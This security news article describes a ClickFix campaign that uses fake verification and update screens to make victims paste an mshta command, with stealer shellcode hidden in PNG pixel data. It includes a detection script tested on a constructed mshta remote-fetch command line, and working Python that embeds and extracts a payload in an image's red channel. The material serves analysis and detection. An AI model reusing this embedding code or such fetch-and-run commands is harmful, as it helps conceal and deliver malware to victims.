Hackers Using ClickFix Technique to Hide Malware within Image Files


Threat actors have evolved their attack strategies by combining the deceptive ClickFix social engineering lure with advanced steganography techniques to conceal malicious payloads within PNG image files.

This sophisticated approach, discovered by Huntress analysts, represents a significant shift in how cybercriminals deliver information-stealing malware to unsuspecting users.

ClickFix operates as a multi-stage attack chain that tricks users into manually executing commands via the Windows Run prompt.

Human Verification Lure (Source - Huntress)

The campaign begins when victims encounter convincing lures, including fake robot verification screens and realistic Windows Update notifications.

These pages instruct users to press Win+R to open the Run box, then paste a command that has been automatically copied to their clipboard.

Once executed, this initial command initiates a dangerous chain of events that ultimately delivers malware to the target system.


Snippet of ClickFix Lure Source (Source - Huntress)

Huntress analysts first observed the campaign in October 2025, and it has since evolved across two distinct lure variants.

The initial “Human Verification” lures have been overshadowed by newer, more convincing fake Windows Update screens that mimic legitimate Microsoft updates in full-screen mode, complete with realistic “Working on updates” animations before prompting the ClickFix command execution.

Steganographic Payload Concealment

The most notable aspect of this campaign is how threat actors conceal their final malware stages. Rather than appending malicious data to images, the attackers use a custom steganographic algorithm to encode shellcode directly within the pixel data of PNG images.

The loader reads the pixel values from one colour channel, the red channel, and reconstructs and decrypts the payload from those values entirely in memory, so no decoded stage is ever written to disk.

Execution chain leading to LummaC2 (Source - Huntress)

The infection chain begins with an mshta.exe command whose URL points at an IP address with its second octet written in hexadecimal rather than dotted decimal, a small obfuscation that defeats naive string matching on the command line.
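The hex-octet trick matters for detection because address parsers in the inet_aton family accept hexadecimal (0x..) and octal (0..) octets, so an IOC written in dotted decimal never string-matches the command line as typed. The following normaliser is an added example for detection tooling; it is not code from Huntress or from the article, and it goes slightly beyond the page by canonicalising any octet written in hex or octal, not only the second one. The command lines it is run against are constructed samples, not observed indicators.

```python
import re

# Added example, not Huntress's code. Canonicalises dotted IP addresses that use
# hex (0x..) or octal (0..) octets so they can be compared with dotted-decimal
# IOCs. Sample command lines in the tests are constructed, not real indicators.

OCTET = r"(?:0[xX][0-9a-fA-F]{1,2}|0[0-7]{1,3}|[0-9]{1,3})"
# Lookarounds instead of \b so "1.2.3.4.5" (a version string) is not cut into an IP.
DOTTED_IP = re.compile(rf"(?<![\w.]){OCTET}(?:\.{OCTET}){{3}}(?![\w.])")


def parse_octet(tok: str) -> int:
    """Interpret one octet the way inet_aton does: 0x = hex, leading 0 = octal."""
    if tok[:2].lower() == "0x":
        value = int(tok[2:], 16)
    elif len(tok) > 1 and tok[0] == "0":
        value = int(tok, 8)
    else:
        value = int(tok, 10)
    if value > 255:
        raise ValueError(f"octet out of range: {tok}")
    return value


def canonical_ip(dotted: str) -> str:
    """Return the address in plain dotted decimal."""
    return ".".join(str(parse_octet(t)) for t in dotted.split("."))


def normalise_command(cmdline: str):
    """Return (command line with addresses canonicalised, [(as_written, canonical), ...])."""
    seen = []

    def repl(m: re.Match) -> str:
        try:
            canon = canonical_ip(m.group(0))
        except ValueError:
            return m.group(0)  # e.g. 999.1.1.1 is not an address; leave it untouched
        seen.append((m.group(0), canon))
        return canon

    return DOTTED_IP.sub(repl, cmdline), seen


def has_encoded_octet(cmdline: str) -> bool:
    """True when any address on the command line was not written in plain dotted decimal."""
    return any(orig != canon for orig, canon in normalise_command(cmdline)[1])


def matches_ioc(cmdline: str, ioc_ips) -> bool:
    """Compare the canonical form of every address against a dotted-decimal IOC list."""
    wanted = set(ioc_ips)
    return any(canon in wanted for _, canon in normalise_command(cmdline)[1])


if __name__ == "__main__":
    sample = "mshta http://192.0xA8.1.10/x"  # constructed, not an observed indicator
    print(normalise_command(sample))
    print(has_encoded_octet(sample), matches_ioc(sample, ["192.168.1.10"]))
```

Run it over process-creation events where the image is mshta.exe; `has_encoded_octet` on its own is a useful signal, because legitimate software has no reason to write an address with a hexadecimal octet.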

The mshta.exe stage retrieves a PowerShell loader that decrypts and reflectively loads a .NET assembly. That assembly acts as the steganographic loader, extracting shellcode hidden within an encrypted PNG image embedded in the assembly as a manifest resource.

The extraction routine walks the bitmap's raw pixel data, computing the byte offset of each pixel from its row and column, and XORs the red-channel value with 114 (0x72) to recover the encrypted shellcode bytes.

The recovered shellcode was generated with Donut, an open-source tool that converts .NET assemblies (among other payload types) into position-independent shellcode that loads and runs them in memory.
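To make the red-channel recovery concrete, here is an added example (not Huntress's code and not the loader's own) that implements both the embedding side and the extraction side described above and round-trips a constructed placeholder payload through a PNG it builds itself, so it runs offline with only the standard library. It assumes details the article does not state: 8-bit RGB pixels, every row stored with PNG filter type 0, and a 4-byte little-endian length header in front of the hidden bytes. The 0x72 XOR key and the row/column offset walk are the parts taken from the article.

```python
import struct
import zlib

# Added example, not Huntress's code nor the loader's own. Reproduces the recovery
# step described in the article: walk the bitmap row by row and column by column,
# read each pixel's red byte and XOR it with 114 (0x72). Assumed (not from the page):
# 8-bit RGB pixels, PNG filter type 0 on every row, 4-byte LE length header.

XOR_KEY = 114
PNG_SIGNATURE = b"\x89PNG\r\n\x1a\n"


def _chunk(tag: bytes, body: bytes) -> bytes:
    """Serialise one PNG chunk: length, tag, body, CRC32 over tag+body."""
    crc = zlib.crc32(tag + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", crc)


def write_png(width: int, height: int, rgb: bytes) -> bytes:
    """Encode row-major RGB bytes (3 per pixel) as an 8-bit RGB PNG using filter 0."""
    stride = width * 3
    raw = b"".join(b"\x00" + rgb[y * stride:(y + 1) * stride] for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)
    return (PNG_SIGNATURE + _chunk(b"IHDR", ihdr)
            + _chunk(b"IDAT", zlib.compress(raw)) + _chunk(b"IEND", b""))


def read_png(data: bytes):
    """Decode an 8-bit RGB, filter-0 PNG into (width, height, packed rgb bytes)."""
    if data[:8] != PNG_SIGNATURE:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos + 8 <= len(data):
        length, tag = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if depth != 8 or ctype != 2:
                raise ValueError("example handles 8-bit RGB only")
        elif tag == b"IDAT":
            idat += body
        elif tag == b"IEND":
            break
        pos += 12 + length
    raw = zlib.decompress(idat)
    stride = width * 3
    rows = []
    for y in range(height):
        row = raw[y * (stride + 1):(y + 1) * (stride + 1)]
        if row[0] != 0:
            raise ValueError("example handles filter type 0 only")
        rows.append(row[1:])
    return width, height, b"".join(rows)


def red_offset(width: int, x: int, y: int) -> int:
    """Byte offset of pixel (x, y)'s red channel in a packed RGB buffer (stride = width*3)."""
    return y * width * 3 + x * 3


def embed(cover_rgb: bytes, width: int, height: int, payload: bytes) -> bytes:
    """Attacker side: write length header + payload into the red channel, XOR 0x72."""
    stream = struct.pack("<I", len(payload)) + payload
    if len(stream) > width * height:
        raise ValueError("cover image too small for payload")
    buf = bytearray(cover_rgb)
    for i, b in enumerate(stream):
        y, x = divmod(i, width)
        buf[red_offset(width, x, y)] = b ^ XOR_KEY
    return bytes(buf)


def extract(png_bytes: bytes) -> bytes:
    """Loader side: recover the hidden bytes from each pixel's red channel."""
    width, height, rgb = read_png(png_bytes)

    def red(i: int) -> int:
        y, x = divmod(i, width)
        return rgb[red_offset(width, x, y)] ^ XOR_KEY

    length = struct.unpack("<I", bytes(red(i) for i in range(4)))[0]
    if length > width * height - 4:
        raise ValueError("length header exceeds image capacity; not a carrier")
    return bytes(red(4 + i) for i in range(length))


def demo() -> bytes:
    """Round-trip a constructed stand-in payload through a constructed cover image."""
    width, height = 16, 8
    cover = bytes((x * 7 + y * 13 + c * 29) % 256
                  for y in range(height) for x in range(width) for c in range(3))
    payload = b"\x90\x90\xcc"  # constructed placeholder bytes, not real shellcode
    png = write_png(width, height, embed(cover, width, height, payload))
    return extract(png)


if __name__ == "__main__":
    print(demo().hex())  # 9090cc
```

The point for an analyst is that the carrier PNG is a perfectly valid image: every chunk CRC checks out and nothing is appended after IEND, so file-format validators and appended-data scanners see nothing. Detection has to come from the loader's behaviour (reading a manifest-resource bitmap and executing the result) rather than from the image itself.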

dnSpy output displaying manifest resource (Source - Huntress)

Huntress researchers documented that the final payloads delivered through this mechanism include information-stealing malware such as LummaC2 and Rhadamanthys, designed to harvest sensitive user credentials and financial information.

This campaign shows how threat actors keep refining their evasion tradecraft. By hiding payloads within image pixel data rather than in traditional file structures, attackers complicate analysis and sidestep signature-based detection, since the carrier is a structurally valid image with no appended data.

However, the attack still relies on the fundamental weakness of social engineering—convincing users to manually execute commands.

Organizations should prioritize user awareness training and consider disabling the Windows Run box through the "Remove Run menu from Start Menu" Group Policy setting (the NoRun value under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer), which also blocks the Win+R shortcut. Note that this only defeats the Run-box variant of the lure: the same command pasted into a PowerShell console, Windows Terminal, or the File Explorer address bar still executes, so pair the policy with monitoring for mshta.exe and powershell.exe launched from explorer.exe with a URL on the command line.
